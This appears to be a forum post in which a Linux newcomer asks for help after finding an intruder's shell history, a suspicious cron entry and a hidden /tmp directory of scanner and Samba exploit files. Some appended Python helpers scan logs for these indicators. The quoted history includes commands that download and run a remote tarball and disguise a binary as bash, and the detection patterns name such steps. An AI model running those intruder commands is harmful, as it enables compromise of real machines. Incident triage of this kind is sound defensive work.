need help with root hack... I think that's what happened. Pretty sure. I'm pretty much a newbie with Linux security, but the following seems pretty obvious to me. I guess I could use some suggestions regarding how serious this is, if it can be fixed/repaired/closed, and ideas of what may have been done. How the heck did it happen? What can I do to prevent it? And if I were running Slackware 10.2, would this have been less likely to happen?

Anyway, I'm running Fedora Core 2, and I found an odd entry in my cron log:

Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (/tmp/.
Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47 bytes of output but got status 0x0046 )

So I looked into /home/testuser and found .bash_history:

ls
wc -l uniq.txt
ls
./eigei 100 &
ps -x
ls
exit
ps -x
exit
w
ps -x
cd /tmp/." ";ls -af
cd w00t;ls
cat vuln.txt
wc -l vuln.txt
ps -x
exit
w
ps -x
cd /tmp/." "/woot;ls
cd /tmp/." "/w00t;ls
cat vuln.txt
mv 0 pscan2;ls
wc -l uniq.txt
./eigei 100 &
exit
w
ps -x
cat /tmp/." "/w00t/vuln.txt
ls /tmp/." "/w00t
exit
w
ps x
kill -9 31257 31256
passwd
/sbin/ifconfig | grep inet
cat /proc/cpuinfo
w
uname -a
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
w
ps x
cat /proc/cpuinfo
ls -a
cd /var/tmp
ls -a
mkdir ." "
cd ." "
ls -a
tar zxvf omar.tar.gz
rm -rf omar.tar.gz
cd .f
mv x bash
export PATH="."
bash
w
ps x
ls -a
cat /proc/cpuinfo
ls - a
ls -a
cd /var/tmp
ls -a
cd ." "
ls -a
cd .f
ls -a
export PATH="."
bash
w
ps x
cat /proc/cpuinfo
w
ps x
cd /var/tmp
ls -a
cd ." "
ls -a
cat /etc/hosts
cat /proc/cpuinfo
ls -a
cd .f
ls -a
export PATH="."
bash
w
ps x
cd /vart/emp
ls -a
cd /var/tmp
ls -a
cd /var/tmp
ls -a
cat /etc/hosts
ls -a
rm -rf ." "
/sbin/ifconfig -a | grep inet
cat /proc/cpuinfo
ls- a
ls- a
wget archive.lydo.org/omar1.tgz
tar zxvf omar1.tgz
rm -rf omar1.tgz
cd .f
mv x bash
./bash
ps x
kill -9 2591
export PATH="."
bash

And a bunch of stuff above that with various text files. So I looked in /tmp and found a second "." directory, /tmp/. /w00t, and in there is:

total 11752
drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
-rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
-rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
-rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
-rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
-rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
-rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
-rwxr-xr-x 1 523 525 121 Apr 21 2003 make
-rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
-rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
-rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
-rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
-rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
-rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
-rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
-rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
-rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
-rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
-rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
-rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c

I removed the user "testuser", and I'm about to remove this dir. But I guess I kind of need to know how bad the damage is. Were they able to get root access? Do they likely know all the passwords? Would changing the passwords even work, or do they likely have some kind of keylogger installed? Any ideas? This is completely new to me.

Thanks!

-Liam
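Added triage helpers, not part of Liam's post or any reply, that run the checks a responder would apply to the evidence above: a cron job launched out of /tmp, dot-space hidden directories, PATH set to ".", a tool renamed to bash, a tarball fetched onto the box, and files owned by a numeric UID with no account. The sample lines are constructed to mirror the post; the hostname archive.example.org and the set of known UIDs are assumptions.

```python
import re
from typing import Dict, List, Set

# Indicators modelled on the evidence in the post: a cron job run out of /tmp,
# dot-space hidden directories, PATH pointed at ".", a tarball fetched onto
# the box, and a tool renamed to "bash" so it blends into `ps` output.
INDICATORS = {
    "cron_job_in_tmp": re.compile(r'CROND\[\d+\]: \(\w+\) CMD \((?:/tmp|/var/tmp)/'),
    "hidden_dot_space_dir": re.compile(r'\."\s*"'),
    "dot_path_export": re.compile(r'export\s+PATH="?\."?\s*$'),  # double-quoted form, as in the post
    "fetch_archive": re.compile(r'^\s*(?:wget|curl)\b.*\.(?:tgz|tar\.gz)\s*$'),
    "renamed_to_bash": re.compile(r'^\s*mv\s+\S+\s+bash\s*$'),
}

def scan(text: str) -> Dict[str, List[str]]:
    """Map each indicator to the lines (cron log or shell history) that match it."""
    hits: Dict[str, List[str]] = {}
    for line in text.splitlines():
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(line.strip())
    return hits

def unknown_owners(ls_output: str, known_uids: Set[int]) -> List[str]:
    """Names in `ls -l` output owned by a bare UID that is not in known_uids.
    ls prints a number when no /etc/passwd entry matches, as with 523/525 in the post."""
    suspect = []
    for line in ls_output.splitlines():
        parts = line.split(None, 8)  # perms links owner group size mon day time|year name
        if len(parts) < 9 or parts[0][0] not in "-dl":
            continue
        owner, name = parts[2], parts[8]
        if owner.isdigit() and int(owner) not in known_uids:
            suspect.append(name)
    return suspect

# Constructed samples mirroring the post (not real data); archive.example.org is a placeholder.
SAMPLE_LOG = '''Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (/tmp/. /w00t/run)
mkdir ." "
cd ." "
wget archive.example.org/omar1.tgz
mv x bash
export PATH="."
cat /tmp/." "/w00t/vuln.txt
'''
SAMPLE_LS = '''drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
-rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
-rw-r--r-- 1 523 525  5767 Apr 21 2003 pscan2.c
-rw-r--r-- 1 testuser testuser 120 Dec 13 11:06 notes.txt
'''
```

Run `scan()` over /var/log/cron and each user's .bash_history, and `unknown_owners()` over `ls -la` of /tmp and /var/tmp, with known_uids read from /etc/passwd.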